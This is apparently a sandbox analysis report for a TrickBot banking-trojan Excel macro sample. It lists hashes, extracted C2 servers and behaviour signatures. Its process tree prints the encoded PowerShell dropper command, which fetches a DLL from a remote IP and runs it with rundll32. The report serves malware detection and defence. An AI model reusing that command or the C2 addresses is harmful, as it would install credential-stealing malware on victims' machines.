trickbot | 0b149fc1f48da1d2c02d778be120427483403cd7519fc7f69e741288b120cb9d

General

Target

RNP-00152.xlsm
Size

87KB
MD5

7ac2366ab4515b9f37be3187deea9bc0
SHA1

c4cee812f0fb97c510e149a28c1a55b6c5da2c9e
SHA256

0b149fc1f48da1d2c02d778be120427483403cd7519fc7f69e741288b120cb9d
SHA512

db221383ef594bb4b2be2fac9a33f465dac8cdaaf4aafa8b376e57ef5ab337c596379100972c9809d79a5ad8293b2a1294308a23b0ee22512aa474f8d0e7fe7e

Score

10^/10

trickbot rob136 banker trojan

Malware Config

Extracted

Family

trickbot

Version

100019

Botnet

rob136

C2

65.152.201.203:443

185.56.175.122:443

46.99.175.217:443

179.189.229.254:443

46.99.175.149:443

181.129.167.82:443

216.166.148.187:443

46.99.188.223:443

128.201.76.252:443

62.99.79.77:443

60.51.47.65:443

24.162.214.166:443

45.36.99.184:443

97.83.40.67:443

184.74.99.214:443

103.105.254.17:443

62.99.76.213:443

82.159.149.52:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4676	3032	cmd.exe	EXCEL.EXE

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

41 1508 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1240 rundll32.exe

flow	pid	process
41	1508	powershell.exe

pid	process
1240	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3032 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1508 powershell.exe
1508 powershell.exe
1508 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 1508 powershell.exe
Token: SeDebugPrivilege 4556 wermgr.exe

pid	process
1508	powershell.exe
1508	powershell.exe
1508	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	4556	wermgr.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE
3032	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

EXCEL.EXEcmd.exerundll32.exerundll32.exe

description	pid	process	target process
PID 3032 wrote to memory of 4676	3032	EXCEL.EXE	cmd.exe
PID 3032 wrote to memory of 4676	3032	EXCEL.EXE	cmd.exe
PID 4676 wrote to memory of 1508	4676	cmd.exe	powershell.exe
PID 4676 wrote to memory of 1508	4676	cmd.exe	powershell.exe
PID 4676 wrote to memory of 1368	4676	cmd.exe	rundll32.exe
PID 4676 wrote to memory of 1368	4676	cmd.exe	rundll32.exe
PID 1368 wrote to memory of 1240	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 1240	1368	rundll32.exe	rundll32.exe
PID 1368 wrote to memory of 1240	1368	rundll32.exe	rundll32.exe
PID 1240 wrote to memory of 1736	1240	rundll32.exe	cmd.exe
PID 1240 wrote to memory of 1736	1240	rundll32.exe	cmd.exe
PID 1240 wrote to memory of 1736	1240	rundll32.exe	cmd.exe
PID 1240 wrote to memory of 4556	1240	rundll32.exe	wermgr.exe
PID 1240 wrote to memory of 4556	1240	rundll32.exe	wermgr.exe
PID 1240 wrote to memory of 4556	1240	rundll32.exe	wermgr.exe
PID 1240 wrote to memory of 4556	1240	rundll32.exe	wermgr.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RNP-00152.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c start /B /WAIT powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA= & start C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADYALgA2ADUALgAxADkANwAvAGkAbQBhAGcAZQBzAC8AcwB1AGIAegBlAHIAbwAuAHAAbgBnACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGMAbABiAC4AZABsAGwAIgA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
3⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe C:\ProgramData\clb.dll,AloperNoteW
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
5⤵
PID:1736

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\clb.dll
MD5
d0a80e47fefaecb2f3e020fecf8288b7

SHA1
06267a23e36f50b2f4f14d668190465a98d5cf91

SHA256
9c0b5647a38a04a289b926c143cde952b1a5869a60ebfbe383ec5231aae750d2

SHA512
b2f2c1860da49fb59e8e91542ef0f2c7788a72a44f88f1dbe83bd63cbe17bc4c200f9b77fd78d83ac1dbc1ac45e2ac1e788ebd364689e6ff28cb5ddb2f13f5e7

Download Submit
\ProgramData\clb.dll
MD5
d0a80e47fefaecb2f3e020fecf8288b7

SHA1
06267a23e36f50b2f4f14d668190465a98d5cf91

SHA256
9c0b5647a38a04a289b926c143cde952b1a5869a60ebfbe383ec5231aae750d2

SHA512
b2f2c1860da49fb59e8e91542ef0f2c7788a72a44f88f1dbe83bd63cbe17bc4c200f9b77fd78d83ac1dbc1ac45e2ac1e788ebd364689e6ff28cb5ddb2f13f5e7

Download Submit
memory/1240-323-0x0000000010001000-0x0000000010003000-memory.dmp

Filesize
8KB

Download
memory/1240-322-0x00000000033E0000-0x00000000033E1000-memory.dmp

Filesize
4KB

Download
memory/1240-320-0x0000000004CA0000-0x0000000004F08000-memory.dmp

Filesize
2.4MB

Download
memory/1240-321-0x0000000004FD0000-0x0000000005015000-memory.dmp

Filesize
276KB

Download
memory/1240-318-0x0000000000000000-mapping.dmp

Download
memory/1368-316-0x0000000000000000-mapping.dmp

Download
memory/1508-301-0x0000014FFB483000-0x0000014FFB485000-memory.dmp

Filesize
8KB

Download
memory/1508-311-0x0000014FFB486000-0x0000014FFB488000-memory.dmp

Filesize
8KB

Download
memory/1508-288-0x0000000000000000-mapping.dmp

Download
memory/1508-300-0x0000014FFB480000-0x0000014FFB482000-memory.dmp

Filesize
8KB

Download
memory/3032-119-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

Filesize
8KB

Download
memory/3032-115-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3032-141-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

Filesize
8KB

Download
memory/3032-127-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3032-121-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

Filesize
8KB

Download
memory/3032-120-0x0000020274BE0000-0x0000020274BE2000-memory.dmp

Filesize
8KB

Download
memory/3032-118-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3032-117-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/3032-116-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmp

Filesize
64KB

Download
memory/4556-324-0x0000000000000000-mapping.dmp

Download
memory/4556-325-0x000002742B920000-0x000002742B949000-memory.dmp

Filesize
164KB

Download
memory/4556-326-0x000002742BA40000-0x000002742BA41000-memory.dmp

Filesize
4KB

Download
memory/4676-287-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads